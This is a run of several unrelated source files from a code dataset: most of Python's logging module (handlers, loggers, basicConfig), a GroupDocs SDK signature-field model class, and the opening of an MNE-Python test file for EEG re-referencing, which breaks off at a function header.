Handler instances dispatch logging events to specific destinations.
The base handler class. Acts as a placeholder which defines the Handler
interface. Handlers can optionally use Formatter instances to format
records as desired. By default, no formatter is specified; in this case,
the 'raw' message as determined by record.message is logged.
"""
def __init__(self, level=NOTSET):
"""
Initializes the instance - basically setting the formatter to None
and the filter list to empty.
"""
Filterer.__init__(self)
self._name = None
self.level = _checkLevel(level)
self.formatter = None
# Add the handler to the global _handlerList (for cleanup on shutdown)
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
"""
Acquire a thread lock for serializing access to the underlying I/O.
"""
if threading:
self.lock = threading.RLock()
else: #pragma: no cover
self.lock = None
def acquire(self):
"""
Acquire the I/O thread lock.
"""
if self.lock:
self.lock.acquire()
def release(self):
"""
Release the I/O thread lock.
"""
if self.lock:
self.lock.release()
def setLevel(self, level):
"""
Set the logging level of this handler. level must be an int or a str.
"""
self.level = _checkLevel(level)
def format(self, record):
"""
Format the specified record.
If a formatter is set, use it. Otherwise, use the default formatter
for the module.
"""
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
"""
Do whatever it takes to actually log the specified logging record.
This version is intended to be implemented by subclasses and so
raises a NotImplementedError.
"""
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
def handle(self, record):
"""
Conditionally emit the specified logging record.
Emission depends on filters which may have been added to the handler.
Wrap the actual emission of the record with acquisition/release of
the I/O thread lock. Returns whether the filter passed the record for
emission.
"""
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
"""
Set the formatter for this handler.
"""
self.formatter = fmt
def flush(self):
"""
Ensure all logging output has been flushed.
This version does nothing and is intended to be implemented by
subclasses.
"""
pass
def close(self):
"""
Tidy up any resources used by the handler.
This version removes the handler from an internal map of handlers,
_handlers, which is used for handler lookup by name. Subclasses
should ensure that this gets called from overridden close()
methods.
"""
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
This method should be called from handlers when an exception is
encountered during an emit() call. If raiseExceptions is false,
exceptions get silently ignored. This is what is mostly wanted
for a logging system - most users will not care about errors in
the logging system, they are more interested in application errors.
You could, however, replace this with a custom handler if you wish.
The record which was being processed is passed in to this method.
"""
if raiseExceptions and sys.stderr: # see issue 13807
ei = sys.exc_info()
try:
traceback.print_exception(ei[0], ei[1], ei[2],
None, sys.stderr)
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
except IOError: #pragma: no cover
pass # see issue 5971
finally:
del ei
class StreamHandler(Handler):
"""
A handler class which writes logging records, appropriately formatted,
to a stream. Note that this class does not close the stream, as
sys.stdout or sys.stderr may be used.
"""
terminator = '\n'
def __init__(self, stream=None):
"""
Initialize the handler.
If stream is not specified, sys.stderr is used.
"""
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
"""
Flushes the stream.
"""
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
"""
Emit a record.
If a formatter is specified, it is used to format the record.
The record is then written to the stream with a trailing newline. If
exception information is present, it is formatted using
traceback.print_exception and appended to the stream. If the stream
has an 'encoding' attribute, it is used to determine how to do the
output to the stream.
"""
try:
msg = self.format(record)
stream = self.stream
stream.write(msg)
stream.write(self.terminator)
self.flush()
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
class FileHandler(StreamHandler):
"""
A handler class which writes formatted logging records to disk files.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
"""
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.delay = delay
if delay:
#We don't open the stream, but we still need to call the
#Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
"""
Closes the stream.
"""
self.acquire()
try:
if self.stream:
self.flush()
if hasattr(self.stream, "close"):
self.stream.close()
StreamHandler.close(self)
self.stream = None
finally:
self.release()
def _open(self):
"""
Open the current base file with the (original) mode and encoding.
Return the resulting stream.
"""
return open(self.baseFilename, self.mode, encoding=self.encoding)
def emit(self, record):
"""
Emit a record.
If the stream was not opened because 'delay' was specified in the
constructor, open it before calling the superclass's emit.
"""
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
class _StderrHandler(StreamHandler):
"""
This class is like a StreamHandler using sys.stderr, but always uses
whatever sys.stderr is currently set to rather than the value of
sys.stderr at handler construction time.
"""
def __init__(self, level=NOTSET):
"""
Initialize the handler.
"""
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder(object):
"""
PlaceHolder instances are used in the Manager logger hierarchy to take
the place of nodes for which no loggers have been defined. This class is
intended for internal use only and not as part of the public API.
"""
def __init__(self, alogger):
"""
Initialize with the specified logger being a child of this placeholder.
"""
self.loggerMap = { alogger : None }
def append(self, alogger):
"""
Add the specified logger as a child of this placeholder.
"""
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
_loggerClass = None
def setLoggerClass(klass):
"""
Set the class to be used when instantiating a logger. The class should
define __init__() such that only a name argument is required, and the
__init__() should call Logger.__init__()
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
def getLoggerClass():
"""
Return the class to be used when instantiating a logger.
"""
return _loggerClass
class Manager(object):
"""
There is [under normal circumstances] just one Manager instance, which
holds the hierarchy of loggers.
"""
def __init__(self, rootnode):
"""
Initialize the manager with the root node of the logger hierarchy.
"""
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
"""
Get a logger with the specified name (channel name), creating it
if it doesn't yet exist. This name is a dot-separated hierarchical
name, such as "a", "a.b", "a.b.c" or similar.
If a PlaceHolder existed for the specified name [i.e. the logger
didn't exist but a child of it did], replace it with the created
logger and fix up the parent/child references which pointed to the
placeholder to now point to the logger.
"""
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def setLoggerClass(self, klass):
"""
Set the class to be used when instantiating a logger with this Manager.
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
"""
Set the factory to be used when instantiating a log record with this
Manager.
"""
self.logRecordFactory = factory
def _fixupParents(self, alogger):
"""
Ensure that there are either loggers or placeholders all the way
from the specified logger to the root of the logger hierarchy.
"""
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
"""
Ensure that children of the placeholder ph are connected to the
specified logger.
"""
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
#The if means ... if not c.parent.name.startswith(nm)
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
"""
Instances of the Logger class represent a single logging channel. A
"logging channel" indicates an area of an application. Exactly how an
"area" is defined is up to the application developer. Since an
application can have any number of areas, logging channels are identified
by a unique string. Application areas can be nested (e.g. an area
of "input processing" might include sub-areas "read CSV files", "read
XLS files" and "read Gnumeric files"). To cater for this natural nesting,
channel names are organized into a namespace hierarchy where levels are
separated by periods, much like the Java or Python package namespace. So
in the instance given above, channel names might be "input" for the upper
level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
There is no arbitrary limit to the depth of nesting.
"""
def __init__(self, name, level=NOTSET):
"""
Initialize the logger with a name and an optional level.
"""
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
def setLevel(self, level):
"""
Set the logging level of this logger. level must be an int or a str.
"""
self.level = _checkLevel(level)
def debug(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'DEBUG'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
"""
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'INFO'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
"""
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'WARNING'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
"""
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'ERROR'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.error("Houston, we have a %s", "major problem", exc_info=1)
"""
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Convenience method for logging an ERROR with exception information.
"""
kwargs['exc_info'] = True
self.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'CRITICAL'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
"""
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
fatal = critical
def log(self, level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
"""
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False):
"""
Find the stack frame of the caller so that we can note the source
file name, line number and function name.
"""
f = currentframe()
#On some versions of IronPython, currentframe() returns None if
#IronPython isn't run with -X:Frames.
if f is not None:
f = f.f_back
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""
A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
"""
Low-level logging routine which creates a LogRecord and then calls
all the handlers of this logger to handle the record.
"""
sinfo = None
if _srcfile:
#IronPython doesn't track Python frames, so findCaller raises an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func, sinfo = self.findCaller(stack_info)
except ValueError: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
"""
Call the handlers for the specified record.
This method is used for unpickled records received from a socket, as
well as those created locally. Logger-level filtering is applied.
"""
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
"""
Add the specified handler to this logger.
"""
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
"""
Remove the specified handler from this logger.
"""
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
"""
See if this logger has any handlers configured.
Loop through all handlers for this logger and its parents in the
logger hierarchy. Return True if a handler was found, else False.
Stop searching up the hierarchy whenever a logger with the "propagate"
attribute set to zero is found - that will be the last logger which
is checked for the existence of handlers.
"""
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
"""
Pass a record to all relevant handlers.
Loop through all handlers for this logger and its parents in the
logger hierarchy. If no handler was found, output a one-off error
message to sys.stderr. Stop searching up the hierarchy whenever a
logger with the "propagate" attribute set to zero is found - that
will be the last logger whose handlers are called.
"""
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None #break out
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
"""
Get the effective level for this logger.
Loop through this logger and its parents in the logger hierarchy,
looking for a non-zero logging level. Return the first one found.
"""
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getChild(self, suffix):
"""
Get a logger which is a descendant to this one.
This is a convenience method, such that
logging.getLogger('abc').getChild('def.ghi')
is the same as
logging.getLogger('abc.def.ghi')
It's useful, for example, when the parent logger is named using
__name__ rather than a literal string.
"""
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
class RootLogger(Logger):
"""
A root logger is not that different to any other logger, except that
it must have a logging level and there is only one instance of it in
the hierarchy.
"""
def __init__(self, level):
"""
Initialize the logger with the name "root".
"""
Logger.__init__(self, "root", level)
_loggerClass = Logger
class LoggerAdapter(object):
"""
An adapter for loggers which makes it easier to specify contextual
information in logging output.
"""
def __init__(self, logger, extra):
"""
Initialize the adapter with a logger and a dict-like object which
provides contextual information. This constructor signature allows
easy stacking of LoggerAdapters, if so desired.
You can effectively pass keyword arguments as shown in the
following example:
adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
"""
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
"""
Process the logging message and keyword arguments passed in to
a logging call to insert contextual information. You can either
manipulate the message itself, the keyword args or both. Return
the message and kwargs modified (or not) to suit your needs.
Normally, you'll only need to override this one method in a
LoggerAdapter subclass for your specific needs.
"""
kwargs["extra"] = self.extra
return msg, kwargs
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
"""
Delegate a debug call to the underlying logger.
"""
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Delegate an info call to the underlying logger.
"""
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Delegate a warning call to the underlying logger.
"""
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Delegate an error call to the underlying logger.
"""
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Delegate an exception call to the underlying logger.
"""
kwargs["exc_info"] = True
self.log(ERROR, msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Delegate a critical call to the underlying logger.
"""
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Delegate a log call to the underlying logger, after adding
contextual information from this adapter instance.
"""
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def setLevel(self, level):
"""
Set the specified level on the underlying logger.
"""
self.logger.setLevel(level)
def getEffectiveLevel(self):
"""
Get the effective level for the underlying logger.
"""
return self.logger.getEffectiveLevel()
def hasHandlers(self):
"""
See if the underlying logger has any handlers.
"""
return self.logger.hasHandlers()
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
def basicConfig(**kwargs):
"""
Do basic configuration for the logging system.
This function does nothing if the root logger already has handlers
configured. It is a convenience method intended for use by simple scripts
to do one-shot configuration of the logging package.
The default behaviour is to create a StreamHandler which writes to
sys.stderr, set a formatter using the BASIC_FORMAT format string, and
add the handler to the root logger.
A number of optional keyword arguments may be specified, which can alter
the default behaviour.
filename Specifies that a FileHandler be created, using the specified
filename, rather than a StreamHandler.
filemode Specifies the mode to open the file, if filename is specified
(if filemode is unspecified, it defaults to 'a').
format Use the specified format string for the handler.
datefmt Use the specified date/time format.
style If a format string is specified, use this to specify the
type of format string (possible values '%', '{', '$', for
%-formatting, :meth:`str.format` and :class:`string.Template`
- defaults to '%').
level Set the root logger level to the specified level.
stream Use the specified stream to initialize the StreamHandler. Note
that this argument is incompatible with 'filename' - if both
are present, 'stream' is ignored.
handlers If specified, this should be an iterable of already created
handlers, which will be added to the root handler. Any handler
in the list which does not have a formatter assigned will be
assigned the formatter created in this function.
Note that you could specify a stream created using open(filename, mode)
rather than passing the filename and mode in. However, it should be
remembered that StreamHandler does not close its stream (since it may be
using sys.stdout or sys.stderr), whereas FileHandler closes its stream
when the handler is closed.
.. versionchanged:: 3.2
Added the ``style`` parameter.
.. versionchanged:: 3.3
Added the ``handlers`` parameter. A ``ValueError`` is now thrown for
incompatible arguments (e.g. ``handlers`` specified together with
``filename``/``filemode``, or ``filename``/``filemode`` specified
together with ``stream``, or ``handlers`` specified together with
``stream``.
"""
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
if len(root.handlers) == 0:
handlers = kwargs.get("handlers")
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.get("filename")
if filename:
mode = kwargs.get("filemode", 'a')
h = FileHandler(filename, mode)
else:
stream = kwargs.get("stream")
h = StreamHandler(stream)
handlers = [h]
fs = kwargs.get("format", BASIC_FORMAT)
dfs = kwargs.get("datefmt", None)
style = kwargs.get("style", '%')
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.get("level")
if level is not None:
root.setLevel(level)
finally:
_releaseLock()
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
"""
Return a logger with the specified name, creating it if necessary.
If no name is specified, return the root logger.
"""
if name:
return Logger.manager.getLogger(name)
else:
return root
def critical(msg, *args, **kwargs):
"""
Log a message with severity 'CRITICAL' on the root logger. If the logger
has no handlers, call basicConfig() to add a console handler with a
pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
fatal = critical
def error(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger, with exception
information. If the logger has no handlers, basicConfig() is called to add
a console handler with a pre-defined format.
"""
kwargs['exc_info'] = True
error(msg, *args, **kwargs)
def warning(msg, *args, **kwargs):
"""
Log a message with severity 'WARNING' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
"""
Log a message with severity 'INFO' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
"""
Log a message with severity 'DEBUG' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level' on the root logger. If
the logger has no handlers, call basicConfig() to add a console handler
with a pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level):
"""
Disable all logging calls of severity 'level' and below.
"""
root.manager.disable = level
def shutdown(handlerList=_handlerList):
"""
Perform any cleanup actions in the logging system (e.g. flushing
buffers).
Should be called at application exit.
"""
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (IOError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except:
if raiseExceptions:
raise
#else, swallow
#Let's try and shutdown automatically on application exit...
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
"""
This handler does nothing. It's intended to be used to avoid the
"No handlers could be found for logger XXX" one-off warning. This is
important for library code, which may contain code to log events. If a user
of the library does not configure logging, the one-off warning might be
produced; to avoid this, the library developer simply needs to instantiate
a NullHandler and add it to the top-level logger of the library module or
package.
"""
def handle(self, record):
"""Stub."""
def emit(self, record):
"""Stub."""
def createLock(self):
self.lock = None
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
Implementation of showwarnings which redirects to logging, which will first
check to see if the file parameter is None. If a file is specified, it will
delegate to the original warnings implementation of showwarning. Otherwise,
it will call warnings.formatwarning and will log the resulting string to a
warnings logger named "py.warnings" with level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
| gpl-3.0 |
liosha2007/temporary-groupdocs-python-sdk | groupdocs/models/SignatureEnvelopeFieldLocationSettings.py | 2 | 1794 | #!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class SignatureEnvelopeFieldLocationSettings:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'page': 'int',
'locationX': 'float',
'locationY': 'float',
'locationWidth': 'float',
'locationHeight': 'float',
'fontName': 'str',
'fontColor': 'str',
'fontSize': 'float',
'fontBold': 'bool',
'fontItalic': 'bool',
'fontUnderline': 'bool',
'forceNewField': 'bool',
'align': 'int'
}
self.page = None # int
self.locationX = None # float
self.locationY = None # float
self.locationWidth = None # float
self.locationHeight = None # float
self.fontName = None # str
self.fontColor = None # str
self.fontSize = None # float
self.fontBold = None # bool
self.fontItalic = None # bool
self.fontUnderline = None # bool
self.forceNewField = None # bool
self.align = None # int
| apache-2.0 |
matthew-tucker/mne-python | mne/io/tests/test_reference.py | 10 | 13045 | # Authors: Marijn van Vliet <[email protected]>
# Alexandre Gramfort <[email protected]>
# Teon Brooks <[email protected]>
#
# License: BSD (3-clause)
import warnings
import os.path as op
import numpy as np
from nose.tools import assert_true, assert_equal, assert_raises
from numpy.testing import assert_array_equal, assert_allclose
from mne import pick_types, Evoked, Epochs, read_events
from mne.io.constants import FIFF
from mne.io import (set_eeg_reference, set_bipolar_reference,
add_reference_channels)
from mne.io.proj import _has_eeg_average_ref_proj
from mne.io.reference import _apply_reference
from mne.datasets import testing
from mne.io import Raw
warnings.simplefilter('always') # enable b/c these tests throw warnings
data_dir = op.join(testing.data_path(download=False), 'MEG', 'sample')
fif_fname = op.join(data_dir, 'sample_audvis_trunc_raw.fif')
eve_fname = op.join(data_dir, 'sample_audvis_trunc_raw-eve.fif')
ave_fname = op.join(data_dir, 'sample_audvis_trunc-ave.fif')
def _test_reference(raw, reref, ref_data, ref_from):
"""Helper function to test whether a reference has been correctly
applied."""
# Separate EEG channels from other channel types
picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads')
picks_other = pick_types(raw.info, meg=True, eeg=False, eog=True,
stim=True, exclude='bads')
# Calculate indices of reference channesl
picks_ref = [raw.ch_names.index(ch) for ch in ref_from]
# Get data
if isinstance(raw, Evoked):
_data = raw.data
_reref = reref.data
else:
_data = raw._data
_reref = reref._data
# Check that the ref has been properly computed
assert_array_equal(ref_data, _data[..., picks_ref, :].mean(-2))
# Get the raw EEG data and other channel data
raw_eeg_data = _data[..., picks_eeg, :]
raw_other_data = _data[..., picks_other, :]
# Get the rereferenced EEG data
reref_eeg_data = _reref[..., picks_eeg, :]
reref_other_data = _reref[..., picks_other, :]
# Undo rereferencing of EEG channels
if isinstance(raw, Epochs):
unref_eeg_data = reref_eeg_data + ref_data[:, np.newaxis, :]
else:
unref_eeg_data = reref_eeg_data + ref_data
# Check that both EEG data and other data is the same
assert_allclose(raw_eeg_data, unref_eeg_data, 1e-6, atol=1e-15)
assert_allclose(raw_other_data, reref_other_data, 1e-6, atol=1e-15)
@testing.requires_testing_data
def test_apply_reference():
"""Test base function for rereferencing"""
raw = Raw(fif_fname, preload=True)
# Rereference raw data by creating a copy of original data
reref, ref_data = _apply_reference(raw, ref_from=['EEG 001', 'EEG 002'],
copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])
# The CAR reference projection should have been removed by the function
assert_true(not _has_eeg_average_ref_proj(reref.info['projs']))
# Test that disabling the reference does not break anything
reref, ref_data = _apply_reference(raw, [])
assert_array_equal(raw._data, reref._data)
# Test that data is modified in place when copy=False
reref, ref_data = _apply_reference(raw, ['EEG 001', 'EEG 002'],
copy=False)
assert_true(raw is reref)
# Test re-referencing Epochs object
raw = Raw(fif_fname, preload=False, add_eeg_ref=False)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
reref, ref_data = _apply_reference(epochs, ref_from=['EEG 001', 'EEG 002'],
copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(epochs, reref, ref_data, ['EEG 001', 'EEG 002'])
# Test re-referencing Evoked object
evoked = epochs.average()
reref, ref_data = _apply_reference(evoked, ref_from=['EEG 001', 'EEG 002'],
copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(evoked, reref, ref_data, ['EEG 001', 'EEG 002'])
# Test invalid input
raw_np = Raw(fif_fname, preload=False)
assert_raises(RuntimeError, _apply_reference, raw_np, ['EEG 001'])
@testing.requires_testing_data
def test_set_eeg_reference():
